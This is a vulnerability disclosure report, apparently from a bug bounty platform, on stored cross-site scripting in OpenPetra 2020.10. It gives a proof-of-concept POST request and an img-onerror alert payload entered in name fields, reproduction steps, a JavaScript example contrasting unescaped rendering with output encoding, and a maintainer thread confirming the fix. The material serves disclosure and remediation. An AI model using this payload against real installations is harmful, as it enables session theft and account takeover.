Cross-site Scripting (XSS) - Stored in openpetra/openpetra

Valid

Reported on

Oct 29th 2021


Description

Multiple stored XSS vulnerabilities in openpetra 2020.10

Proof of Concept

// PoC.req
POST /api/serverMSponsorship.asmx/TSponsorshipWebConnector_MaintainChild HTTP/1.1
Host: demo.openpetra.org
Cookie: ASP.NET_SessionId=AEC44A33068E58B5DE583F3E; OpenPetraSessionID=b987029b-104f-45f1-aa29-339a49d0d55a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 287
Origin: https://demo.openpetra.org
Referer: https://demo.openpetra.org/SponsorShip/Children/MaintainChildren
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"APartnerKey":-1,"ASponsorshipStatus":"CHILDREN_HOME","AFirstName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AFamilyName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AGender":null,"ADateOfBirth":"null","AUserId":"","APhoto":"","new_photo":"","ALedgerNumber":"43","AUploadPhoto":false}

Steps to Reproduce

Sponsorship

Go to Sponsorship and choose Add new child.

In the First name and Surname fields, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

Partner

Go to Partner and choose Add new partner.

In the Title, First name and Family name fields, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

The XSS triggers when a user goes to Donations, chooses Add new transaction, and searches the Donor Key by the name of that partner.

Impact

An attacker can use this vulnerability to steal a user's cookie and gain unauthorized access to that user's account with the stolen cookie.
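The root cause behind the steps above is that the stored name fields are later rendered into the page as markup. The following JavaScript, added here and not taken from OpenPetra, shows the vulnerable concatenation pattern beside an output-encoded version, using the report's payload as input; the row template and record field names are assumptions.

```javascript
// Added example (not OpenPetra code): the report's stored XSS arises when the
// stored FirstName/FamilyName fields are rendered into markup without output
// encoding. The row template and record shape below are assumptions; the
// payload is the one from the report.

// Payload from the report, as it would come back from the server once stored.
const PAYLOAD = '"><iMg SrC="x" oNeRRor="alert(1);">';

// Constructed sample partner record (field names assumed for illustration).
const PARTNER = { PartnerKey: 43000001, FirstName: PAYLOAD, FamilyName: PAYLOAD };

// Vulnerable pattern: stored fields concatenated straight into HTML. The
// browser parses the injected <img> element and runs its onerror handler.
function renderRowUnsafe(p) {
  return '<tr data-key="' + p.PartnerKey + '"><td>' +
    p.FirstName + ' ' + p.FamilyName + '</td></tr>';
}

// Contextual output encoding: escape the five characters that can change
// meaning in HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Fixed pattern: every untrusted value is encoded at the point of rendering,
// so the payload is displayed literally as the partner's name.
function renderRowSafe(p) {
  return '<tr data-key="' + escapeHtml(p.PartnerKey) + '"><td>' +
    escapeHtml(p.FirstName) + ' ' + escapeHtml(p.FamilyName) + '</td></tr>';
}

// Check for the defect: any tag in the output other than the template's own
// <tr>/<td> elements must have come from the data.
function containsInjectedTag(html) {
  return /<(?!\/?(?:tr|td)\b)/i.test(html);
}

console.log('unsafe injected:', containsInjectedTag(renderRowUnsafe(PARTNER))); // true
console.log('safe injected:  ', containsInjectedTag(renderRowSafe(PARTNER)));   // false
```

Encoding at render time is the primary defence; the server-side input validation the maintainer mentions is a useful second layer but does not by itself make every rendering context safe.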

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the openpetra team and are waiting to hear back a month ago
openpetra/openpetra maintainer validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
openpetra/openpetra maintainer
a month ago

Maintainer


I don't see it as a high risk, because you need to be a registered user to be able to add sponsored children. But I see the problem in general, that we have to validate all input coming from the web. I will file a ticket at GitHub for the OpenPetra project, and I will fix it for the next release. Thank you for taking the time and reporting the issue!

lethanhphuc
a month ago

Researcher


You’re welcome ^^.

openpetra/openpetra maintainer confirmed that a fix has been merged on 82152f a month ago
The fix bounty has been dropped